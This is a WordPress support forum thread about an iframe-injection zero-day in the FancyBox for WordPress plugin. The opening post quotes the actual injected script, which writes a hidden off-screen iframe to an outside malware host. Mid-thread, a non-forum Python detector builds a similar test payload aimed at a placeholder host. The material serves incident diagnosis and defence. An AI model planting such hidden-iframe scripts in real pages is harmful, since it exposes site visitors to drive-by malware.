• Resolved SherabGyamtso (@sherabgyamtso)


    I have the latest version of your plugin and WordPress.

    Everything was ok until today. I’ve got a report from sitelock that my Contact page on my blog is infected with malware with iframe redirecting to h t t p : / / 203koko.eu/hjnfh/ipframe2.php

    Checked my page source on this contact page and found something like this:

    <script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="https://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>');}/*]]>*/</script>

    I deactivated just Total Cache and this page is not infected anymore.

    I have other plugins (up to date) active:

    Akismet Version 3.0.4
    Custom Posts Per Page Version 1.7.1
    FancyBox for WordPress Version 3.0.2
    GetSocial Version 2.0.1
    NextCellent Gallery Version 1.9.25.1
    Official StatCounter Plugin Version 1.6.9
    Use Google Libraries Version 1.6.2
    WordPress SEO Version 1.7.1

    Can anybody help me determine the source of this malware?

    Best

    Maciek

    https://www.remarpro.com/plugins/w3-total-cache/

Viewing 15 replies - 31 through 45 (of 110 total)
  • Forgive me for my ignorance, I did the search SQL query on one of my other sites that didn’t have Fancy Box installed. I just did the search SQL query on the infected site and here is what I got:

    a:2:{s:10:"extraCalls";s:1:" ";s:16:"extraCallsEnable";s:2:"on";}

    Sorry about that.

    Anyone have a backup of the db from yesterday? Can they check the same key whether it’s not empty?

    snip

    I have another website that is using fancy box and the site is working properly.

    Hey guys,

    Anyone affected would be willing to share logs? If you can email them to [email protected], we are trying to get a better picture of what is happening.

    thanks,

    It’s definitely a vulnerability in fancybox. Disable at once.

    DB Backup from 28.01.2015:
    a:2:{s:10:"extraCalls";s:1:" ";s:16:"extraCallsEnable";s:2:"on";}

    DB Backup from 14.12.2014:

    a:38:{s:11:"borderColor";s:7:"#BBBBBB";s:15:"showCloseButton";s:2:"on";s:11:"closeHorPos";s:5:"right";s:11:"closeVerPos";s:3:"top";s:12:"paddingColor";s:7:"#FFFFFF";s:7:"padding";s:2:"10";s:11:"overlayShow";s:2:"on";s:12:"overlayColor";s:7:"#666666";s:14:"overlayOpacity";s:3:"0.3";s:9:"titleShow";s:2:"on";s:13:"titlePosition";s:6:"inside";s:10:"titleColor";s:7:"#333333";s:13:"showNavArrows";s:2:"on";s:11:"zoomOpacity";s:2:"on";s:11:"zoomSpeedIn";s:3:"500";s:12:"zoomSpeedOut";s:3:"500";s:15:"zoomSpeedChange";s:3:"300";s:12:"transitionIn";s:4:"fade";s:13:"transitionOut";s:4:"fade";s:8:"easingIn";s:11:"easeOutBack";s:9:"easingOut";s:10:"easeInBack";s:12:"easingChange";s:14:"easeInOutQuart";s:10:"imageScale";s:2:"on";s:14:"centerOnScroll";s:2:"on";s:18:"hideOnOverlayClick";s:2:"on";s:18:"enableEscapeButton";s:2:"on";s:11:"galleryType";s:3:"all";s:16:"customExpression";s:74:"jQuery(thumbnails).addClass("fancybox").attr("rel","fancybox").getTitle();";s:14:"autoDimensions";s:2:"on";s:10:"frameWidth";s:3:"560";s:11:"frameHeight";s:3:"340";s:15:"callbackOnStart";s:0:"";s:16:"callbackOnCancel";s:32:"function() { alert("Cancel!"); }";s:18:"callbackOnComplete";s:0:"";s:17:"callbackOnCleanup";s:33:"function() { alert("CleanUp!"); }";s:15:"callbackOnClose";s:0:"";s:16:"extraCallsEnable";s:2:"on";s:10:"extraCalls";s:171:"var arr = jQuery("a.fancybox");
    jQuery.each(arr, function() {
     var title = jQuery(this).children("img").attr("alt");
     beforeLoad: jQuery(this).attr('title',title);
    });";}

    Not sure if that helps, though. Just looks like some cleaned up options.
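The two checks the posters did by hand, reading the page source for the hidden iframe and comparing the serialized FancyBox settings row against an older backup, can be scripted. The block below is an added example written for this thread; it is not code from the plugin, from Sucuri, or from any poster. It assumes nothing about the name of the wp_options row (the thread only calls it "the same key"), so it works on whatever serialized value you pull from the database. All sample data is constructed here: the injected payload has the same shape as the one quoted in the first post but points at the placeholder host malicious.invalid, and the clean backup is a three-key subset of the 14.12.2014 value above. Only the standard library is used.

```python
import re

# Indicators of injected content inside a plugin settings string. The thread's
# payload was a <script> that document.write()s an off-screen <div> wrapping an
# <iframe>; these markers cover each piece of that pattern.
INJECTION_MARKERS = {
    "script_tag": re.compile(r"<script\b", re.I),
    "iframe": re.compile(r"<iframe\b", re.I),
    "document_write": re.compile(r"document\.write\s*\(", re.I),
    "offscreen_css": re.compile(r"left\s*:\s*-\d{3,}px", re.I),
}

# An absolutely positioned off-screen <div> immediately wrapping an <iframe>;
# group 1 captures the iframe src.
HIDDEN_IFRAME = re.compile(
    r"<div[^>]*position\s*:\s*absolute[^>]*left\s*:\s*-\d+px[^>]*>\s*"
    r"<iframe[^>]*\bsrc=[\"']([^\"']+)",
    re.I | re.S,
)


def php_unserialize(buf: bytes):
    """Decode PHP serialize() output for the subset WordPress options use:
    strings, ints, bools, null and (nested) arrays. String lengths are byte
    counts, so the input is bytes, not str."""
    value, end = _parse(buf, 0)
    if end != len(buf):
        raise ValueError("trailing data after serialized value")
    return value


def _parse(buf: bytes, pos: int):
    tag = buf[pos:pos + 1]
    if tag == b"s":                                  # s:<len>:"<bytes>";
        colon = buf.index(b":", pos + 2)
        length = int(buf[pos + 2:colon])
        start, end = colon + 2, colon + 2 + length
        if buf[end:end + 2] != b'";':
            raise ValueError("bad string length at offset %d" % pos)
        return buf[start:end].decode("utf-8", "replace"), end + 2
    if tag in (b"i", b"b"):                          # i:<int>;  b:<0|1>;
        end = buf.index(b";", pos)
        num = int(buf[pos + 2:end])
        return (bool(num) if tag == b"b" else num), end + 1
    if tag == b"N":                                  # N;
        return None, pos + 2
    if tag == b"a":                                  # a:<count>:{key value ...}
        colon = buf.index(b":", pos + 2)
        count = int(buf[pos + 2:colon])
        pos = colon + 2
        items = {}
        for _ in range(count):
            key, pos = _parse(buf, pos)
            val, pos = _parse(buf, pos)
            items[key] = val
        if buf[pos:pos + 1] != b"}":
            raise ValueError("unterminated array at offset %d" % pos)
        return items, pos + 1
    raise ValueError("unsupported type tag %r at offset %d" % (tag, pos))


def scan_option_value(serialized: bytes) -> dict:
    """Map each string-valued setting that matches an injection marker to the
    list of marker names it matched. An empty dict means nothing suspicious."""
    settings = php_unserialize(serialized)
    hits = {}
    for key, value in (settings.items() if isinstance(settings, dict) else []):
        if isinstance(value, str):
            matched = [name for name, rx in INJECTION_MARKERS.items() if rx.search(value)]
            if matched:
                hits[key] = matched
    return hits


def dropped_keys(before: bytes, after: bytes) -> list:
    """Settings keys present in an older backup but gone now. An array that
    shrank from dozens of keys to two is the 'settings restored' symptom."""
    return sorted(set(php_unserialize(before)) - set(php_unserialize(after)))


def find_hidden_iframes(html: str) -> list:
    """Return the src of every iframe wrapped in an off-screen absolute div."""
    return [m.group(1) for m in HIDDEN_IFRAME.finditer(html)]


# ---- constructed samples, used only to build test data (not real site data) ----
def _ser_str(s: str) -> bytes:
    raw = s.encode("utf-8")
    return b's:%d:"%s";' % (len(raw), raw)


def _ser_array(d: dict) -> bytes:
    body = b"".join(_ser_str(k) + _ser_str(v) for k, v in d.items())
    return b"a:%d:{%s}" % (len(d), body)


# Hypothetical payload shaped like the thread's, pointing at a placeholder host.
PAYLOAD = ('<script>if(navigator.userAgent.match(/msie/i)){document.write(\''
           '<div style="position:absolute;left:-2000px;width:2000px">'
           '<iframe src="http://malicious.invalid/frame.php" width="20" height="30">'
           '</iframe></div>\');}</script>')

CLEAN_BACKUP = _ser_array({"borderColor": "#BBBBBB", "extraCallsEnable": "on",
                           "extraCalls": 'var arr = jQuery("a.fancybox");'})
INJECTED = _ser_array({"extraCallsEnable": "on", "extraCalls": PAYLOAD})
# Same two-key shape as the wiped value quoted in the thread.
WIPED = b'a:2:{s:10:"extraCalls";s:1:" ";s:16:"extraCallsEnable";s:2:"on";}'
PAGE_SOURCE = "<html><body><p>Contact</p>" + PAYLOAD + "</body></html>"

if __name__ == "__main__":
    print("clean   :", scan_option_value(CLEAN_BACKUP))
    print("injected:", scan_option_value(INJECTED))
    print("dropped :", dropped_keys(CLEAN_BACKUP, WIPED))
    print("iframes :", find_hidden_iframes(PAGE_SOURCE))
```

To use it on a real site, pull the option value with a query such as `SELECT option_value FROM wp_options WHERE option_value LIKE '%extraCalls%'` (the row name is not given in the thread, so match on the key instead), pass the raw bytes to scan_option_value, and run find_hidden_iframes over the fetched HTML of the affected page. A wiped value like the one above returns no marker hits, so dropped_keys against a known-good backup is the check that catches the "settings restored" state on its own.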

    I disabled and cleared my database and resubmitted my site to google. Hopefully this fixes the issue

    @gennady thanks for your help.

    We can confirm it is a vulnerability (0-day) in the plugin. We actually have the malware (exploit) payloads being used to compromise sites.

    We will post more details in a bit.

    Thanks Daniel for the info. I just caught this post from the Sucuri.net site:

    https://www.malwareremovalservice.com/fancybox-for-wordpress-iframe-injection

    Oh, that’s not us. Just someone trying to copy (or look like) us ??

    Our blog post is here:

    https://blog.sucuri.net/2015/02/zero-day-in-the-fancybox-for-wordpress-plugin.html

    thanks!

    Crap, sorry about that link, should have paid more attention.

    It is the same on my website!
    Some days ago I found my Fancybox settings all restored, and I found that weird!
    Today my website has been blocked and I thought it could be something related to that plugin, and now I found the confirmation and removed it.
    Thank you.

    Has Google ‘okayed’ anyone’s site yet?

    (after removing the plugin, and submitting to Google)

    Mine was just approved and the website is working.

  • The topic ‘Possible malware’ is closed to new replies.